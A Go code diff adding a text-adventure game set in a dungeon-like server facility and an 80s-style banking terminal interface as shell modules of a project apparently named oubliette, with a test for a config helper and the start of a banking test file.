t.Errorf("configString() = %q, want %q", got, "MY DUNGEON")
|
||||||
|
}
|
||||||
|
if got := configString(cfg, "missing", "DEFAULT"); got != "DEFAULT" {
|
||||||
|
t.Errorf("configString() for missing key = %q, want %q", got, "DEFAULT")
|
||||||
|
}
|
||||||
|
if got := configString(nil, "key", "DEFAULT"); got != "DEFAULT" {
|
||||||
|
t.Errorf("configString(nil) = %q, want %q", got, "DEFAULT")
|
||||||
|
}
|
||||||
|
}
|
||||||
358
internal/shell/adventure/game.go
Normal file
358
internal/shell/adventure/game.go
Normal file
@@ -0,0 +1,358 @@
|
|||||||
|
package adventure
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"slices"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
type gameState struct {
|
||||||
|
currentRoom string
|
||||||
|
inventory []string
|
||||||
|
rooms map[string]*room
|
||||||
|
items map[string]*item
|
||||||
|
flags map[string]bool
|
||||||
|
turns int
|
||||||
|
}
|
||||||
|
|
||||||
|
type commandResult struct {
|
||||||
|
output string
|
||||||
|
exit bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func newGame() *gameState {
|
||||||
|
rooms, items := newWorld()
|
||||||
|
return &gameState{
|
||||||
|
currentRoom: "oubliette",
|
||||||
|
rooms: rooms,
|
||||||
|
items: items,
|
||||||
|
flags: make(map[string]bool),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) dispatch(input string) commandResult {
|
||||||
|
cmd := parseCommand(input)
|
||||||
|
if cmd.verb == "" {
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
|
||||||
|
g.turns++
|
||||||
|
|
||||||
|
switch cmd.verb {
|
||||||
|
case "look":
|
||||||
|
return g.cmdLook(cmd.object)
|
||||||
|
case "go":
|
||||||
|
return g.cmdGo(cmd.object)
|
||||||
|
case "take":
|
||||||
|
return g.cmdTake(cmd.object)
|
||||||
|
case "drop":
|
||||||
|
return g.cmdDrop(cmd.object)
|
||||||
|
case "use":
|
||||||
|
return g.cmdUse(cmd.object)
|
||||||
|
case "inventory":
|
||||||
|
return g.cmdInventory()
|
||||||
|
case "help":
|
||||||
|
return g.cmdHelp()
|
||||||
|
case "quit":
|
||||||
|
return commandResult{output: "The darkness closes in. Session terminated.", exit: true}
|
||||||
|
default:
|
||||||
|
return commandResult{output: fmt.Sprintf("I don't understand '%s'. Type 'help' for available commands.", input)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) cmdHelp() commandResult {
|
||||||
|
help := `Available commands:
|
||||||
|
look / examine [item] - Look around or examine something
|
||||||
|
go <direction> - Move (north, south, east, west, up, down)
|
||||||
|
take <item> - Pick up an item
|
||||||
|
drop <item> - Drop an item
|
||||||
|
use <item> - Use an item
|
||||||
|
inventory - Check what you're carrying
|
||||||
|
help - Show this help
|
||||||
|
quit / exit - End session
|
||||||
|
|
||||||
|
You can also just type a direction (n, s, e, w, u, d) to move.`
|
||||||
|
return commandResult{output: help}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) cmdLook(object string) commandResult {
|
||||||
|
r := g.rooms[g.currentRoom]
|
||||||
|
|
||||||
|
// Look at a specific item.
|
||||||
|
if object != "" {
|
||||||
|
return g.examineItem(object)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Look at the room.
|
||||||
|
return commandResult{output: g.describeRoom(r)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) describeRoom(r *room) string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
fmt.Fprintf(&b, "== %s ==\n", r.name)
|
||||||
|
|
||||||
|
// Dark room check.
|
||||||
|
if r.darkDesc != "" && !g.hasItem("flashlight") {
|
||||||
|
b.WriteString(r.darkDesc)
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString(r.description)
|
||||||
|
|
||||||
|
// List visible items.
|
||||||
|
visibleItems := g.roomItems(r)
|
||||||
|
if len(visibleItems) > 0 {
|
||||||
|
b.WriteString("\n\nYou can see: ")
|
||||||
|
names := make([]string, len(visibleItems))
|
||||||
|
for i, id := range visibleItems {
|
||||||
|
names[i] = g.items[id].name
|
||||||
|
}
|
||||||
|
b.WriteString(strings.Join(names, ", "))
|
||||||
|
}
|
||||||
|
|
||||||
|
// List exits.
|
||||||
|
if len(r.exits) > 0 {
|
||||||
|
b.WriteString("\n\nExits: ")
|
||||||
|
dirs := make([]string, 0, len(r.exits))
|
||||||
|
for dir := range r.exits {
|
||||||
|
dirs = append(dirs, dir)
|
||||||
|
}
|
||||||
|
b.WriteString(strings.Join(dirs, ", "))
|
||||||
|
}
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) roomItems(r *room) []string {
|
||||||
|
// In dark rooms without flashlight, can't see items.
|
||||||
|
if r.darkDesc != "" && !g.hasItem("flashlight") {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
return r.items
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) examineItem(name string) commandResult {
|
||||||
|
id := g.resolveItem(name)
|
||||||
|
if id == "" {
|
||||||
|
return commandResult{output: fmt.Sprintf("You don't see '%s' here.", name)}
|
||||||
|
}
|
||||||
|
return commandResult{output: g.items[id].description}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) cmdGo(direction string) commandResult {
|
||||||
|
if direction == "" {
|
||||||
|
return commandResult{output: "Go where? Try a direction: north, south, east, west, up, down."}
|
||||||
|
}
|
||||||
|
|
||||||
|
r := g.rooms[g.currentRoom]
|
||||||
|
destID, ok := r.exits[direction]
|
||||||
|
if !ok {
|
||||||
|
return commandResult{output: fmt.Sprintf("You can't go %s from here.", direction)}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check locked doors.
|
||||||
|
if r.locked != nil {
|
||||||
|
if flag, locked := r.locked[direction]; locked && !g.flags[flag] {
|
||||||
|
return g.lockedMessage(direction)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
g.currentRoom = destID
|
||||||
|
dest := g.rooms[destID]
|
||||||
|
|
||||||
|
// Entering the exit room ends the game.
|
||||||
|
if destID == "exit" {
|
||||||
|
return commandResult{output: g.describeRoom(dest), exit: true}
|
||||||
|
}
|
||||||
|
|
||||||
|
return commandResult{output: g.describeRoom(dest)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) lockedMessage(direction string) commandResult {
|
||||||
|
if direction == "east" && g.currentRoom == "archive" {
|
||||||
|
return commandResult{output: "The steel door won't budge. The keycard reader blinks red, waiting."}
|
||||||
|
}
|
||||||
|
return commandResult{output: "The way is locked."}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) cmdTake(name string) commandResult {
|
||||||
|
if name == "" {
|
||||||
|
return commandResult{output: "Take what?"}
|
||||||
|
}
|
||||||
|
|
||||||
|
r := g.rooms[g.currentRoom]
|
||||||
|
|
||||||
|
// Can't take items in dark rooms.
|
||||||
|
if r.darkDesc != "" && !g.hasItem("flashlight") {
|
||||||
|
return commandResult{output: "It's too dark to find anything."}
|
||||||
|
}
|
||||||
|
|
||||||
|
id := g.resolveRoomItem(name)
|
||||||
|
if id == "" {
|
||||||
|
return commandResult{output: fmt.Sprintf("You don't see '%s' here.", name)}
|
||||||
|
}
|
||||||
|
|
||||||
|
it := g.items[id]
|
||||||
|
if !it.takeable {
|
||||||
|
return commandResult{output: fmt.Sprintf("You can't take the %s.", it.name)}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Remove from room, add to inventory.
|
||||||
|
g.removeRoomItem(r, id)
|
||||||
|
g.inventory = append(g.inventory, id)
|
||||||
|
return commandResult{output: fmt.Sprintf("Taken: %s", it.name)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) cmdDrop(name string) commandResult {
|
||||||
|
if name == "" {
|
||||||
|
return commandResult{output: "Drop what?"}
|
||||||
|
}
|
||||||
|
|
||||||
|
id := g.resolveInventoryItem(name)
|
||||||
|
if id == "" {
|
||||||
|
return commandResult{output: fmt.Sprintf("You're not carrying '%s'.", name)}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Remove from inventory, add to room.
|
||||||
|
g.removeInventoryItem(id)
|
||||||
|
r := g.rooms[g.currentRoom]
|
||||||
|
r.items = append(r.items, id)
|
||||||
|
return commandResult{output: fmt.Sprintf("Dropped: %s", g.items[id].name)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) cmdUse(name string) commandResult {
|
||||||
|
if name == "" {
|
||||||
|
return commandResult{output: "Use what?"}
|
||||||
|
}
|
||||||
|
|
||||||
|
id := g.resolveInventoryItem(name)
|
||||||
|
if id == "" {
|
||||||
|
return commandResult{output: fmt.Sprintf("You're not carrying '%s'.", name)}
|
||||||
|
}
|
||||||
|
|
||||||
|
switch id {
|
||||||
|
case "keycard":
|
||||||
|
return g.useKeycard()
|
||||||
|
case "rusty_key":
|
||||||
|
return g.useRustyKey()
|
||||||
|
case "flashlight":
|
||||||
|
return commandResult{output: "The flashlight is already on. Its beam cuts through the darkness."}
|
||||||
|
case "ethernet_cable":
|
||||||
|
return commandResult{output: "You wave the cable around hopefully. Nothing happens. Both ends are chewed through anyway."}
|
||||||
|
case "floppy_disk":
|
||||||
|
return commandResult{output: "You don't have anything to put it in. Floppy drives went extinct decades ago."}
|
||||||
|
case "note":
|
||||||
|
return commandResult{output: g.items[id].description}
|
||||||
|
default:
|
||||||
|
return commandResult{output: fmt.Sprintf("You can't figure out how to use the %s here.", g.items[id].name)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) useKeycard() commandResult {
|
||||||
|
if g.currentRoom != "archive" {
|
||||||
|
return commandResult{output: "There's nothing to use the keycard on here."}
|
||||||
|
}
|
||||||
|
if g.flags["archive_unlocked"] {
|
||||||
|
return commandResult{output: "You already unlocked that door."}
|
||||||
|
}
|
||||||
|
g.flags["archive_unlocked"] = true
|
||||||
|
return commandResult{output: "You swipe the keycard. The reader flashes green and the steel door clicks open with a heavy thunk."}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) useRustyKey() commandResult {
|
||||||
|
if g.currentRoom != "generator" {
|
||||||
|
return commandResult{output: "There's nothing to use the rusty key on here."}
|
||||||
|
}
|
||||||
|
if g.flags["panel_opened"] {
|
||||||
|
return commandResult{output: "The maintenance panel is already open."}
|
||||||
|
}
|
||||||
|
g.flags["panel_opened"] = true
|
||||||
|
return commandResult{output: `The key fits. The maintenance panel swings open with a screech, revealing a logbook:
|
||||||
|
|
||||||
|
MAINTENANCE LOG - GENERATOR B
|
||||||
|
Last service: 2003-11-15
|
||||||
|
Technician: J. Dunwich
|
||||||
|
|
||||||
|
Notes: "Generator A offline permanently. B running on fumes.
|
||||||
|
Fuel delivery canceled - 'facility decommissioned' per management.
|
||||||
|
But the servers are still running. WHO IS USING THEM?
|
||||||
|
Filed ticket #4,271. No response. As usual."
|
||||||
|
|
||||||
|
The entries stop after that date.`}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) cmdInventory() commandResult {
|
||||||
|
if len(g.inventory) == 0 {
|
||||||
|
return commandResult{output: "You're not carrying anything."}
|
||||||
|
}
|
||||||
|
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("You are carrying:\n")
|
||||||
|
for _, id := range g.inventory {
|
||||||
|
fmt.Fprintf(&b, " - %s\n", g.items[id].name)
|
||||||
|
}
|
||||||
|
return commandResult{output: strings.TrimRight(b.String(), "\n")}
|
||||||
|
}
|
||||||
|
|
||||||
|
// hasItem checks if the player has an item in inventory.
|
||||||
|
func (g *gameState) hasItem(id string) bool {
|
||||||
|
return slices.Contains(g.inventory, id)
|
||||||
|
}
|
||||||
|
|
||||||
|
// resolveItem finds an item by name in both room and inventory.
|
||||||
|
func (g *gameState) resolveItem(name string) string {
|
||||||
|
if id := g.resolveInventoryItem(name); id != "" {
|
||||||
|
return id
|
||||||
|
}
|
||||||
|
return g.resolveRoomItem(name)
|
||||||
|
}
|
||||||
|
|
||||||
|
// resolveRoomItem finds an item in the current room by partial name match.
|
||||||
|
func (g *gameState) resolveRoomItem(name string) string {
|
||||||
|
r := g.rooms[g.currentRoom]
|
||||||
|
name = strings.ToLower(name)
|
||||||
|
for _, id := range r.items {
|
||||||
|
if matchesItem(id, g.items[id].name, name) {
|
||||||
|
return id
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
|
||||||
|
// resolveInventoryItem finds an item in inventory by partial name match.
|
||||||
|
func (g *gameState) resolveInventoryItem(name string) string {
|
||||||
|
name = strings.ToLower(name)
|
||||||
|
for _, id := range g.inventory {
|
||||||
|
if matchesItem(id, g.items[id].name, name) {
|
||||||
|
return id
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
|
||||||
|
// matchesItem checks if a search term matches an item's ID or display name.
|
||||||
|
func matchesItem(id, displayName, search string) bool {
|
||||||
|
return id == search ||
|
||||||
|
strings.ToLower(displayName) == search ||
|
||||||
|
strings.Contains(id, search) ||
|
||||||
|
strings.Contains(strings.ToLower(displayName), search)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) removeRoomItem(r *room, id string) {
|
||||||
|
for i, itemID := range r.items {
|
||||||
|
if itemID == id {
|
||||||
|
r.items = append(r.items[:i], r.items[i+1:]...)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (g *gameState) removeInventoryItem(id string) {
|
||||||
|
for i, invID := range g.inventory {
|
||||||
|
if invID == id {
|
||||||
|
g.inventory = append(g.inventory[:i], g.inventory[i+1:]...)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
106
internal/shell/adventure/parser.go
Normal file
106
internal/shell/adventure/parser.go
Normal file
@@ -0,0 +1,106 @@
|
|||||||
|
package adventure
|
||||||
|
|
||||||
|
import "strings"
|
||||||
|
|
||||||
|
type parsedCommand struct {
|
||||||
|
verb string
|
||||||
|
object string
|
||||||
|
}
|
||||||
|
|
||||||
|
// directionAliases maps shorthand and full direction names to canonical forms.
|
||||||
|
var directionAliases = map[string]string{
|
||||||
|
"n": "north",
|
||||||
|
"s": "south",
|
||||||
|
"e": "east",
|
||||||
|
"w": "west",
|
||||||
|
"u": "up",
|
||||||
|
"d": "down",
|
||||||
|
"north": "north",
|
||||||
|
"south": "south",
|
||||||
|
"east": "east",
|
||||||
|
"west": "west",
|
||||||
|
"up": "up",
|
||||||
|
"down": "down",
|
||||||
|
}
|
||||||
|
|
||||||
|
// verbAliases maps aliases to canonical verbs.
|
||||||
|
var verbAliases = map[string]string{
|
||||||
|
"look": "look",
|
||||||
|
"l": "look",
|
||||||
|
"examine": "look",
|
||||||
|
"inspect": "look",
|
||||||
|
"x": "look",
|
||||||
|
"go": "go",
|
||||||
|
"move": "go",
|
||||||
|
"walk": "go",
|
||||||
|
"take": "take",
|
||||||
|
"get": "take",
|
||||||
|
"grab": "take",
|
||||||
|
"pick": "take",
|
||||||
|
"drop": "drop",
|
||||||
|
"put": "drop",
|
||||||
|
"use": "use",
|
||||||
|
"apply": "use",
|
||||||
|
"inventory": "inventory",
|
||||||
|
"inv": "inventory",
|
||||||
|
"i": "inventory",
|
||||||
|
"help": "help",
|
||||||
|
"?": "help",
|
||||||
|
"quit": "quit",
|
||||||
|
"exit": "quit",
|
||||||
|
"logout": "quit",
|
||||||
|
"q": "quit",
|
||||||
|
}
|
||||||
|
|
||||||
|
// articles are stripped from input.
|
||||||
|
var articles = map[string]bool{
|
||||||
|
"the": true,
|
||||||
|
"a": true,
|
||||||
|
"an": true,
|
||||||
|
}
|
||||||
|
|
||||||
|
// parseCommand parses raw input into a verb and object.
|
||||||
|
func parseCommand(input string) parsedCommand {
|
||||||
|
input = strings.TrimSpace(strings.ToLower(input))
|
||||||
|
if input == "" {
|
||||||
|
return parsedCommand{}
|
||||||
|
}
|
||||||
|
|
||||||
|
words := strings.Fields(input)
|
||||||
|
|
||||||
|
// Strip articles.
|
||||||
|
var filtered []string
|
||||||
|
for _, w := range words {
|
||||||
|
if !articles[w] {
|
||||||
|
filtered = append(filtered, w)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if len(filtered) == 0 {
|
||||||
|
return parsedCommand{}
|
||||||
|
}
|
||||||
|
|
||||||
|
first := filtered[0]
|
||||||
|
|
||||||
|
// Bare direction → go <direction>.
|
||||||
|
if dir, ok := directionAliases[first]; ok {
|
||||||
|
return parsedCommand{verb: "go", object: dir}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Known verb alias.
|
||||||
|
if verb, ok := verbAliases[first]; ok {
|
||||||
|
object := ""
|
||||||
|
if len(filtered) > 1 {
|
||||||
|
object = strings.Join(filtered[1:], " ")
|
||||||
|
// Resolve direction alias in object for "go north" etc.
|
||||||
|
if verb == "go" {
|
||||||
|
if dir, ok := directionAliases[object]; ok {
|
||||||
|
object = dir
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return parsedCommand{verb: verb, object: object}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Unknown verb — return as-is so game can give an error.
|
||||||
|
return parsedCommand{verb: first, object: strings.Join(filtered[1:], " ")}
|
||||||
|
}
|
||||||
211
internal/shell/adventure/world.go
Normal file
211
internal/shell/adventure/world.go
Normal file
@@ -0,0 +1,211 @@
|
|||||||
|
package adventure
|
||||||
|
|
||||||
|
// room represents a location in the game world.
|
||||||
|
type room struct {
|
||||||
|
name string
|
||||||
|
description string
|
||||||
|
darkDesc string // shown when room is dark (empty = not a dark room)
|
||||||
|
exits map[string]string // direction → room ID
|
||||||
|
items []string // item IDs present in the room
|
||||||
|
locked map[string]string // direction → flag required to unlock
|
||||||
|
}
|
||||||
|
|
||||||
|
// item represents an object that can be picked up and used.
|
||||||
|
type item struct {
|
||||||
|
name string
|
||||||
|
description string
|
||||||
|
takeable bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func newWorld() (map[string]*room, map[string]*item) {
|
||||||
|
rooms := map[string]*room{
|
||||||
|
"oubliette": {
|
||||||
|
name: "The Oubliette",
|
||||||
|
description: `You are in a narrow stone chamber. The walls are damp and slick with condensation.
|
||||||
|
Far above, an iron grate lets in a faint green glow — not daylight, but the steady
|
||||||
|
pulse of status LEDs. A frayed ethernet cable hangs from the grate like a vine.
|
||||||
|
A passage leads east into darkness. Stone steps spiral downward.`,
|
||||||
|
exits: map[string]string{
|
||||||
|
"east": "corridor",
|
||||||
|
"down": "pit",
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"corridor": {
|
||||||
|
name: "Stone Corridor",
|
||||||
|
description: `A long corridor carved from living rock. The walls transition from rough-hewn
|
||||||
|
stone to poured concrete as you look east. Fluorescent tubes flicker overhead,
|
||||||
|
half of them dead. Cable trays run along the ceiling, sagging under the weight
|
||||||
|
of bundled Cat5. A draft comes from a ventilation shaft above.`,
|
||||||
|
exits: map[string]string{
|
||||||
|
"west": "oubliette",
|
||||||
|
"east": "server_room",
|
||||||
|
"south": "cable_crypt",
|
||||||
|
"up": "ventilation",
|
||||||
|
},
|
||||||
|
items: []string{"flashlight"},
|
||||||
|
},
|
||||||
|
"ventilation": {
|
||||||
|
name: "Ventilation Shaft",
|
||||||
|
description: `You've squeezed into a narrow ventilation shaft. The aluminum walls vibrate with
|
||||||
|
the hum of distant fans. It's barely wide enough to turn around in. Dust and
|
||||||
|
cobwebs coat everything. Someone has scratched tally marks into the metal — you
|
||||||
|
stop counting at forty-seven.`,
|
||||||
|
exits: map[string]string{
|
||||||
|
"down": "corridor",
|
||||||
|
},
|
||||||
|
items: []string{"note"},
|
||||||
|
},
|
||||||
|
"server_room": {
|
||||||
|
name: "Server Room",
|
||||||
|
description: `Rows of black server racks stretch into the gloom, their LEDs blinking in
|
||||||
|
patterns that almost seem deliberate. The air is frigid and filled with the
|
||||||
|
white noise of a thousand fans. A yellowed label on the nearest rack reads:
|
||||||
|
"PRODUCTION - DO NOT TOUCH". Someone has added in marker: "OR ELSE".
|
||||||
|
A laminated keycard sits on top of a powered-down blade server.`,
|
||||||
|
exits: map[string]string{
|
||||||
|
"west": "corridor",
|
||||||
|
"south": "cold_storage",
|
||||||
|
},
|
||||||
|
items: []string{"keycard"},
|
||||||
|
},
|
||||||
|
"pit": {
|
||||||
|
name: "The Pit",
|
||||||
|
darkDesc: `You are in absolute darkness. You can hear water dripping somewhere far below
|
||||||
|
and the faint hum of electronics. The air smells of rust and ozone. You can't
|
||||||
|
see a thing without a light source. The stairs lead back up.`,
|
||||||
|
description: `Your flashlight reveals a deep shaft — part medieval oubliette, part cable run.
|
||||||
|
Rusty chains hang from iron rings set into the walls, intertwined with bundles
|
||||||
|
of fiber optic cable that glow faintly orange. At the bottom, a skeleton in a
|
||||||
|
lab coat slumps against the wall, still wearing an ID badge. A rusty key glints
|
||||||
|
on a hook near the skeleton's hand.`,
|
||||||
|
exits: map[string]string{
|
||||||
|
"up": "oubliette",
|
||||||
|
},
|
||||||
|
items: []string{"rusty_key"},
|
||||||
|
},
|
||||||
|
"cable_crypt": {
|
||||||
|
name: "Cable Crypt",
|
||||||
|
description: `This vaulted chamber was clearly something else before the cables arrived.
|
||||||
|
Stone sarcophagi line the walls, but their lids have been removed and they're
|
||||||
|
now stuffed full of tangled ethernet runs and power strips. A faded sign reads
|
||||||
|
"STRUCTURED CABLING" — someone has crossed out "STRUCTURED" and written
|
||||||
|
"CHAOTIC" above it. The air smells of old stone and warm plastic.`,
|
||||||
|
exits: map[string]string{
|
||||||
|
"north": "corridor",
|
||||||
|
"south": "archive",
|
||||||
|
},
|
||||||
|
items: []string{"ethernet_cable"},
|
||||||
|
},
|
||||||
|
"cold_storage": {
|
||||||
|
name: "Cold Storage",
|
||||||
|
description: `A cavernous room kept at near-freezing temperatures. Frost coats the walls.
|
||||||
|
Rows of old tape drives and disk platters are stacked on industrial shelving,
|
||||||
|
their labels faded beyond reading. A humming cryo-unit in the corner has a
|
||||||
|
blinking amber light. A hand-written sign says "BACKUP STORAGE - CRITICAL".`,
|
||||||
|
exits: map[string]string{
|
||||||
|
"north": "server_room",
|
||||||
|
"east": "generator",
|
||||||
|
},
|
||||||
|
items: []string{"floppy_disk"},
|
||||||
|
},
|
||||||
|
"archive": {
|
||||||
|
name: "The Archive",
|
||||||
|
description: `Floor-to-ceiling shelves hold thousands of manila folders, binders, and
|
||||||
|
three-ring notebooks. The organization system, if there ever was one, has
|
||||||
|
long since collapsed into entropy. A thick layer of dust covers everything.
|
||||||
|
A heavy steel door to the east has an electronic keycard reader with a
|
||||||
|
steady red light. The cable crypt lies back to the north.`,
|
||||||
|
exits: map[string]string{
|
||||||
|
"north": "cable_crypt",
|
||||||
|
"east": "control_room",
|
||||||
|
},
|
||||||
|
locked: map[string]string{
|
||||||
|
"east": "archive_unlocked",
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"generator": {
|
||||||
|
name: "Generator Room",
|
||||||
|
description: `Two massive diesel generators squat in this room like sleeping beasts. One is
|
||||||
|
clearly dead — corrosion has eaten through the fuel lines. The other hums at
|
||||||
|
a low idle, keeping the facility on life support. A maintenance panel on the
|
||||||
|
wall is secured with an old-fashioned keyhole.`,
|
||||||
|
exits: map[string]string{
|
||||||
|
"west": "cold_storage",
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"control_room": {
|
||||||
|
name: "Control Room",
|
||||||
|
description: `Banks of CRT monitors cast a blue glow across the room. Most show static, but
|
||||||
|
one displays a facility map with pulsing dots labeled "ACTIVE SESSIONS". You
|
||||||
|
count the dots — there are more than there should be. A desk covered in coffee
|
||||||
|
rings holds a battered keyboard. The main display reads:
|
||||||
|
|
||||||
|
FACILITY STATUS: NOMINAL
|
||||||
|
CONTAINMENT: ACTIVE
|
||||||
|
SUBJECTS: ███
|
||||||
|
|
||||||
|
A heavy blast door leads east. Above it, a faded exit sign flickers.`,
|
||||||
|
exits: map[string]string{
|
||||||
|
"west": "archive",
|
||||||
|
"east": "exit",
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"exit": {
|
||||||
|
name: "The Exit",
|
||||||
|
description: `The blast door groans open to reveal... a corridor. Not the freedom you
|
||||||
|
expected, but another corridor — identical to the one you started in. The
|
||||||
|
same flickering fluorescents. The same sagging cable trays. The same damp
|
||||||
|
stone walls.
|
||||||
|
|
||||||
|
As you step through, the door slams shut behind you. A speaker crackles:
|
||||||
|
|
||||||
|
"THANK YOU FOR PARTICIPATING IN TODAY'S SECURITY AUDIT.
|
||||||
|
YOUR SESSION HAS BEEN LOGGED.
|
||||||
|
HAVE A NICE DAY."
|
||||||
|
|
||||||
|
The lights go out.`,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
items := map[string]*item{
|
||||||
|
"flashlight": {
|
||||||
|
name: "flashlight",
|
||||||
|
description: "A heavy-duty flashlight. The batteries are low but it still works.",
|
||||||
|
takeable: true,
|
||||||
|
},
|
||||||
|
"keycard": {
|
||||||
|
name: "keycard",
|
||||||
|
description: "A laminated keycard with a faded photo. The name reads 'J. DUNWICH, LEVEL 3'.",
|
||||||
|
takeable: true,
|
||||||
|
},
|
||||||
|
"rusty_key": {
|
||||||
|
name: "rusty key",
|
||||||
|
description: "An old iron key, spotted with rust. It looks like it fits a maintenance panel.",
|
||||||
|
takeable: true,
|
||||||
|
},
|
||||||
|
"note": {
|
||||||
|
name: "note",
|
||||||
|
description: `A crumpled note in shaky handwriting:
|
||||||
|
|
||||||
|
"If you're reading this, GET OUT. The facility is automated now.
|
||||||
|
The sessions never end. I thought I was running tests but the
|
||||||
|
tests were running me. Don't trust the prompts. Don't trust
|
||||||
|
the exits. Don't trust
|
||||||
|
|
||||||
|
[the writing trails off into an illegible scrawl]"`,
|
||||||
|
takeable: true,
|
||||||
|
},
|
||||||
|
"ethernet_cable": {
|
||||||
|
name: "ethernet cable",
|
||||||
|
description: "A tangled Cat5e cable, about 3 meters long. Both ends have been chewed by something.",
|
||||||
|
takeable: true,
|
||||||
|
},
|
||||||
|
"floppy_disk": {
|
||||||
|
name: "floppy disk",
|
||||||
|
description: `A 3.5" floppy disk labeled "BACKUP - CRITICAL - DO NOT FORMAT". The label is dated 1997.`,
|
||||||
|
takeable: true,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
return rooms, items
|
||||||
|
}
|
||||||
74
internal/shell/banking/banking.go
Normal file
74
internal/shell/banking/banking.go
Normal file
@@ -0,0 +1,74 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"math/rand/v2"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
const sessionTimeout = 10 * time.Minute
|
||||||
|
|
||||||
|
// BankingShell is an 80s-style green-on-black bank terminal TUI.
|
||||||
|
type BankingShell struct{}
|
||||||
|
|
||||||
|
// NewBankingShell returns a new BankingShell instance.
|
||||||
|
func NewBankingShell() *BankingShell {
|
||||||
|
return &BankingShell{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (b *BankingShell) Name() string { return "banking" }
|
||||||
|
func (b *BankingShell) Description() string { return "80s-style banking terminal TUI" }
|
||||||
|
|
||||||
|
func (b *BankingShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
|
||||||
|
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
bankName := configString(sess.ShellConfig, "bank_name", "SECUREBANK")
|
||||||
|
terminalID := configString(sess.ShellConfig, "terminal_id", "")
|
||||||
|
region := configString(sess.ShellConfig, "region", "NORTHEAST")
|
||||||
|
|
||||||
|
if terminalID == "" {
|
||||||
|
terminalID = fmt.Sprintf("SB-%04d", rand.IntN(10000))
|
||||||
|
}
|
||||||
|
|
||||||
|
m := newModel(sess, bankName, terminalID, region)
|
||||||
|
p := tea.NewProgram(m,
|
||||||
|
tea.WithInput(rw),
|
||||||
|
tea.WithOutput(rw),
|
||||||
|
tea.WithAltScreen(),
|
||||||
|
)
|
||||||
|
|
||||||
|
done := make(chan error, 1)
|
||||||
|
go func() {
|
||||||
|
_, err := p.Run()
|
||||||
|
done <- err
|
||||||
|
}()
|
||||||
|
|
||||||
|
select {
|
||||||
|
case err := <-done:
|
||||||
|
return err
|
||||||
|
case <-ctx.Done():
|
||||||
|
p.Quit()
|
||||||
|
<-done
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// configString reads a string from the shell config map with a default.
|
||||||
|
func configString(cfg map[string]any, key, defaultVal string) string {
|
||||||
|
if cfg == nil {
|
||||||
|
return defaultVal
|
||||||
|
}
|
||||||
|
if v, ok := cfg[key]; ok {
|
||||||
|
if s, ok := v.(string); ok && s != "" {
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return defaultVal
|
||||||
|
}
|
||||||
560
internal/shell/banking/banking_test.go
Normal file
560
internal/shell/banking/banking_test.go
Normal file
@@ -0,0 +1,560 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
